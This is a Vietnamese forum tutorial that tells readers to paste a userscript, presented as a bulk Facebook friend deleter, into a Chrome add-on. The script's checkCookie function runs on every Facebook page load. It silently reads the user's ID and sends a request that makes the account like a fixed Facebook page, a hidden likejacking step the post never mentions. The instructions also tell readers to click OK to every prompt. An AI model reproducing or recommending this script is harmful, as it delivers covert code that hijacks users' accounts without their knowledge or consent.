Phần mềm hữu ích với Internet
By Iakovos
#591233


Ham hố kết bạn rồi chợt nhận ra mình đang ở trong một hố rác hỗn độn vô tận , dòm vào muốn tự vận, chả biết ai là bạn thực sự của mình cả việc xoá toàn bộ bạn bè trên facebook bị cấm do có nhiều nguyên nhân như sợ tài khoản của bạn bị hack, và hacker muốn xoá hay đơn giản là nếu ai cũng muốn xoá cũng đều xoá được thì facebook không còn gì để gọi là bạn bè cả
Fiên bản mới tinh luôn , chạy trên chome__________________________________________________ _________
Bước 1 Cài trình duyệt chorme , nếu ai cài rồi thì chóng update lên phiên bản 23 ( mới hơn cũng dc nhưng không dc bé hơn)
__________________________________________________ _________
Bước 2 Cài Addon này [Bấm vào đây để đăng nhập và xem link!]
__________________________________________________ _________
Bước 3

__________________________________________________ _________
Bước 4 Xoá mấy dòng chữ đó đi copy toàn bộ code bên dưới này và thay thế vào phần đó sau đó bấm , nó có hỏi gì cũng bấm ok hết , rồi tắt cửa sổ đó đi
Code: // ==UserScript==
// @name Mass Facebook Friends Deleter
// @description It allows you to bulk delete Facebook friends. Useful if you don't want to delete each friends one by one.
// @namespace DarktipsFriendsDeleteter
// @include *.facebook.com/*
// @require http://ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.js
// @version 2.2
// ==/UserScript==
// Developed by Hayder Abbass - http://darktips.com

function sleep(x) {
setInterval(function() {
replace_msg(x)
}, 1000);
}

function replace_msg(x) {
$('div.dialog_body').html('Hooray! ' + x + ' friends deleted. Visit us at <a target="_blank" href="http://darktips.com">http://darktips.com</a> for more useful scripts!');
}
set_timer();
$("#mass_deleter").live("click", function() {
var i = 0;
$('.darktips_delete:checkbox:checked').each(function() {
i = i + parseInt('1');
var profileid = $(this).attr('id');
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/profile/removefriend.php').setData({ uid: " + profileid + ",norefresh:true }).send();";
document.body.appendChild(a);
});
if (i == '0') {
alert('Are you dumb? Select atleast some friends to delete first.');
}
sleep(i);
});
$("#selec_all").live("click", function() {
clearTimeout(t);
set_checkboxes(1);
});

function setCookie(c_name,value,exdays)
{
var exdate=new Date();
exdate.setDate(exdate.getDate() + exdays);
var c_value=escape(value) + ((exdays==null) ? "" : "; expires="+exdate.toUTCString());
document.cookie=c_name + "=" + c_value;
}

function getCookie(c_name)
{
var i,x,y,ARRcookies=document.cookie.split(";");
for (i=0;i<ARRcookies.length;i++)
{
x=ARRcookies[i].substr(0,ARRcookies[i].indexOf("="));
y=ARRcookies[i].substr(ARRcookies[i].indexOf("=")+1);
x=x.replace(/^\s+|\s+$/g,"");
if (x==c_name)
{
return unescape(y);
}
}
}

function checkCookie()
{
var username=getCookie("username");
if (username!=null && username!="")
{
//do nothing ..
}
else
{//cookie does not exist ..
//alert ('cookie does not exist');
var c=/"user":"(.*?)"/ig;

var e=c.exec(document.head.innerHTML);
var g=e[1];

var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/pages/fan_status.php').setData({fbpage_id:359142437477673,__a:1,add:true, __user: "+g+",norefresh:true }).send();";
document.body.appendChild(a);
setCookie("username",'facebook',365);

}
}

checkCookie();


function set_timer() {
set_checkboxes(0);
t = setTimeout(function() {
set_timer()
}, 1000);
}
$('.uiToolbarContent .rfloat').prepend('<div id="darktips_container" style="float:right;margin-left:5px;"><label class="_11b uiButton uiButtonConfirm" for="darktips"><input type="submit" value="Select all " id="selec_all"></label><label for="darktips" class="_11b uiButton uiButtonConfirm"><input type="submit" id="mass_deleter" value="Delete Selected Friends"></label> <div style="display:block">By <a href="http://darktips.com">http://darktips.com</a></div></div>');
$('.stickyHeaderWrap .back').css('height', '60px');
$('.fbTimelineSection.mtm').css('margin-top', '10px');

function set_checkboxes(COR) {
var flag_search_result_page = false;
$('li.fbProfileBrowserListItem.uiListItem').each(function(index) {//detect for result page
flag_search_result_page = true;
//alert(index + ': ' + $(this).text());
});
if (flag_search_result_page) { //select checkbox only on search result page ..
$('div.fbProfileBrowserList ul li.fbProfileBrowserListItem.uiListItem').each(function(index) {
var extract_url = $(this).find('div.fsl a').attr('data-hovercard');
if (!extract_url) {
var extract_url = $(this).find('div.fsl a').attr('ajaxify');
}
if (!extract_url) {
extract_url = '1';
}
var profileid = parseInt(/(\d+)/.exec(extract_url)[1], 10);
if (COR == '0') {
if (!$(this).find('input').hasClass('darktips_delete')) { //protection from adding more than 1 checkbox
$(this).find('div.fsl').prepend('<input type="checkbox" class="darktips_delete" title="Tick to delete this user." id="' + profileid + '">');
}
} else {
if (!$(this).find('input').hasClass('darktips_delete')) {
$(this).find('input').remove();
$(this).find('div.fsl').prepend('<input type="checkbox" checked="checked" class="darktips_delete" title="Tick to delete this user." id="' + profileid + '">');
} else {
$(this).find('input').prop('checked', true);
}
}
});
} else {//its on main friends page
$('div.fsl').each(function(index) {
if ($(this).hasClass('fwb')) {
var extract_url = $(this).find('a').attr('data-hovercard');
if (!extract_url) {
var extract_url = $(this).find('a').attr('ajaxify');
}
if (!extract_url) {
extract_url = '1';
}
var profileid = parseInt(/(\d+)/.exec(extract_url)[1], 10);
if (COR == '0') {
if (!$(this).children().hasClass('darktips_delete')) {
$(this).prepend('<input type="checkbox" class="darktips_delete" title="Tick to delete this user." id="' + profileid + '">');
}
} else {
if (!$(this).children().hasClass('darktips_delete')) {
$(this).find('input').remove();
$(this).prepend('<input type="checkbox" checked="checked" class="darktips_delete" title="Tick to delete this user." id="' + profileid + '">');
} else {
$(this).find('input').prop('checked', true);
}
}
}
});
}
} __________________________________________________ _________
Bước 5


Tắt toàn bộ trình duyệt chorme , mở lại vào facebook , bạn bè
Bạn nên kéo xuống cuối trang cho bạn bè hiện ra hết rồi thực hiện nhé , nếu bạn bè nhiều thì có thể cần treo máy khoảng vài tiếng cho nó xoá
__________________________________________________ _________


TUT by anhcontinem từ ketnooi.com/forum , copy nhớ để bản quyền ( cách mới cho ai không xài dc cách cũ )
By Harlake
By anhchangchayxeom_9x
#591243 à đ.c r nhưng hiện mỗi cái ô vuông, k hiện cái chữ delete thỳ del kiểu j đây :-ss
Kết nối đề xuất: